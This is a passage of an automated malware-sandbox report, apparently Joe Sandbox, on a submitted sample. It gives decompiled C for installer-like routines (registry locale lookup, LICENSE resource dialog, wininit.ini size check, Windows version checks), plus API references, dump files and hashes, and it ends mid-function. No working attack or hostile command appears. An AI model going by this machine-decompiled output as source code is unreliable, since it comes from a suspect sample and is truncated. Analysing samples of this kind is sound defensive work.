                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A468CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A41140,00000000,?,?,0000000C), ref: 00A468F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A46902
                                                                                                                                                                                                                                              • Part of subcall function 00A466F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A4691A), ref: 00A46741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 00A468C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            • Opcode ID: 5e2cb387b6ff3c3851acaebf0d00a5cbcd564c25ef823f936802f3f949bab386
                                                                                                                                                                                                                                            • Instruction ID: a4ac2f7c45c9e4ced935420cb5c58d6e4a0abf3f5e72d9261f31560e166f0cc1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2cb387b6ff3c3851acaebf0d00a5cbcd564c25ef823f936802f3f949bab386
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD31823DA002189FDB31CF55DC44BAAB7B8EBCB714F000195E949A2241DB719D868F53
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A43A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E00A4468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0xa48d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E00A4468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0xa48d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0xa48d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa49124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E00A46517(_t19, 0x7d1, 0, E00A43100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0xa48d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa49124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0xa48d4c);
                                                                                                                                                                                                                                            					 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x00a43a46
                                                                                                                                                                                                                                            0x00a43a57
                                                                                                                                                                                                                                            0x00a43a5d
                                                                                                                                                                                                                                            0x00a43a63
                                                                                                                                                                                                                                            0x00a43a6a
                                                                                                                                                                                                                                            0x00a43a91
                                                                                                                                                                                                                                            0x00a43a9a
                                                                                                                                                                                                                                            0x00a43ad8
                                                                                                                                                                                                                                            0x00a43b13
                                                                                                                                                                                                                                            0x00a43b19
                                                                                                                                                                                                                                            0x00a43b1b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43b21
                                                                                                                                                                                                                                            0x00a43ae7
                                                                                                                                                                                                                                            0x00a43af4
                                                                                                                                                                                                                                            0x00a43afc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43afe
                                                                                                                                                                                                                                            0x00a43a87
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43a87
                                                                                                                                                                                                                                            0x00a43aa8
                                                                                                                                                                                                                                            0x00a43ab3
                                                                                                                                                                                                                                            0x00a43ab9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43ab9
                                                                                                                                                                                                                                            0x00a43a78
                                                                                                                                                                                                                                            0x00a43a82
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A42F64,?,00000002,00000000), ref: 00A43A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A43AB3
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A43AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00A43B13
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: FindResourceA.KERNEL32(00A40000,000007D6,00000005), ref: 00A4652A
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: LoadResource.KERNEL32(00A40000,00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A46538
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: DialogBoxIndirectParamA.USER32(00A40000,00000000,00000547,00A419E0,00000000), ref: 00A46557
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: FreeResource.KERNEL32(00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A46560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00A43100,00000000,00000000), ref: 00A43AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                            • Opcode ID: 5ffaef4423d100e5d2c1543f214366565aa61ab4a952633af04bf3ea6fecfe3c
                                                                                                                                                                                                                                            • Instruction ID: d40fd9e5d338e17c9e09d24636bd7c5ea41596e87f2da89a6a0316071ef77a07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ffaef4423d100e5d2c1543f214366565aa61ab4a952633af04bf3ea6fecfe3c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E112C3D741201ABDB24DFB6AD09F1B39B9DBDBB40B10463EB541E51A1DBBF88028620
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A424E0(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t7;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = __ebx;
                                                                                                                                                                                                                                            				_t7 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                            				_t25 = 0x104;
                                                                                                                                                                                                                                            				_t26 = 0;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					E00A4658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                            					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                            					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                            						_lclose(_t25);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x00a424e0
                                                                                                                                                                                                                                            0x00a424eb
                                                                                                                                                                                                                                            0x00a424f2
                                                                                                                                                                                                                                            0x00a424f7
                                                                                                                                                                                                                                            0x00a42504
                                                                                                                                                                                                                                            0x00a4250e
                                                                                                                                                                                                                                            0x00a4251d
                                                                                                                                                                                                                                            0x00a4252c
                                                                                                                                                                                                                                            0x00a42541
                                                                                                                                                                                                                                            0x00a42546
                                                                                                                                                                                                                                            0x00a42553
                                                                                                                                                                                                                                            0x00a42555
                                                                                                                                                                                                                                            0x00a42555
                                                                                                                                                                                                                                            0x00a42546
                                                                                                                                                                                                                                            0x00a4256c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A42506
                                                                                                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A4252C
                                                                                                                                                                                                                                            • _lopen.KERNEL32 ref: 00A4253B
                                                                                                                                                                                                                                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A4254C
                                                                                                                                                                                                                                            • _lclose.KERNEL32(00000000), ref: 00A42555
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                            • String ID: wininit.ini
                                                                                                                                                                                                                                            • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                            • Opcode ID: 82867233c1d40db288942449cebd003dc390bf5550de094cacd1dc3b11497a43
                                                                                                                                                                                                                                            • Instruction ID: 6b80a3d3094dd1de7cc5d96f2d3f1600ce6c42f97ad35353ea9c815f8b90a171
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82867233c1d40db288942449cebd003dc390bf5550de094cacd1dc3b11497a43
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01923E600118A7D720DBA59C08EDF7B7CEBD6750F000165FA49D3190DA758E868A92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A436EE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                            				signed int _v420;
                                                                                                                                                                                                                                            				signed int _v424;
                                                                                                                                                                                                                                            				CHAR* _v428;
                                                                                                                                                                                                                                            				CHAR* _v432;
                                                                                                                                                                                                                                            				signed int _v436;
                                                                                                                                                                                                                                            				CHAR* _v440;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                                            				CHAR* _t91;
                                                                                                                                                                                                                                            				CHAR* _t94;
                                                                                                                                                                                                                                            				int _t97;
                                                                                                                                                                                                                                            				CHAR* _t98;
                                                                                                                                                                                                                                            				signed char _t99;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				signed short _t107;
                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                            				short _t113;
                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                            				signed char _t115;
                                                                                                                                                                                                                                            				short _t119;
                                                                                                                                                                                                                                            				CHAR* _t123;
                                                                                                                                                                                                                                            				CHAR* _t124;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                                                                                            				signed int _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				CHAR* _t138;
                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t72 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                            				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            				_t115 = __ecx;
                                                                                                                                                                                                                                            				_t135 = 0;
                                                                                                                                                                                                                                            				_v432 = __ecx;
                                                                                                                                                                                                                                            				_t138 = 0;
                                                                                                                                                                                                                                            				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                            					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                            					_t119 = 2;
                                                                                                                                                                                                                                            					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                            					__eflags = _t77;
                                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                                            						_t119 = 0;
                                                                                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                                                                                            						 *0xa48184 = 1;
                                                                                                                                                                                                                                            						 *0xa48180 = 1;
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						 *0xa49a40 = _t119;
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						__eflags =  *0xa48a34 - _t138; // 0x0
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                                                                                                            						if(_t115 == 0) {
                                                                                                                                                                                                                                            							goto L66;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v428 = _t135;
                                                                                                                                                                                                                                            						__eflags = _t119;
                                                                                                                                                                                                                                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                            						_t11 =  &_v420;
                                                                                                                                                                                                                                            						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                            						__eflags =  *_t11;
                                                                                                                                                                                                                                            						_v440 = _t115;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                            							_v436 = E00A42A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                            							_t91 = E00A42A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                            							_t123 = _v436;
                                                                                                                                                                                                                                            							_t133 = 0x54d;
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 < 0) {
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								__eflags = _v420 - 1;
                                                                                                                                                                                                                                            								if(_v420 == 1) {
                                                                                                                                                                                                                                            									_t138 = 0x54c;
                                                                                                                                                                                                                                            									L36:
                                                                                                                                                                                                                                            									__eflags = _t138;
                                                                                                                                                                                                                                            									if(_t138 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            										if(_t138 == _t133) {
                                                                                                                                                                                                                                            											L30:
                                                                                                                                                                                                                                            											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                            											_t115 = 0;
                                                                                                                                                                                                                                            											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                            											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                            											_t133 = _v432;
                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                            												_t124 = _v440;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                            												_v420 =  &_v268;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t124;
                                                                                                                                                                                                                                            											if(_t124 == 0) {
                                                                                                                                                                                                                                            												_t135 = _v436;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t99 = _t124[0x30];
                                                                                                                                                                                                                                            												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                            												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                            												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t115 = 0x104;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa48a38 & 0x00000001;
                                                                                                                                                                                                                                            											if(( *0xa48a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            												L64:
                                                                                                                                                                                                                                            												_push(0);
                                                                                                                                                                                                                                            												_push(0x30);
                                                                                                                                                                                                                                            												_push(_v420);
                                                                                                                                                                                                                                            												_push("cent");
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												__eflags = _t135;
                                                                                                                                                                                                                                            												if(_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												__eflags =  *_t135;
                                                                                                                                                                                                                                            												if( *_t135 == 0) {
                                                                                                                                                                                                                                            													goto L64;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												MessageBeep(0);
                                                                                                                                                                                                                                            												_t94 = E00A4681F(_t115);
                                                                                                                                                                                                                                            												__eflags = _t94;
                                                                                                                                                                                                                                            												if(_t94 == 0) {
                                                                                                                                                                                                                                            													L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E00A467C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E00A428E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0xa49a40 = _t119;
                                                                                                                                                                                                                                            						 *0xa48184 = 1;
                                                                                                                                                                                                                                            						 *0xa48180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0xa49a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
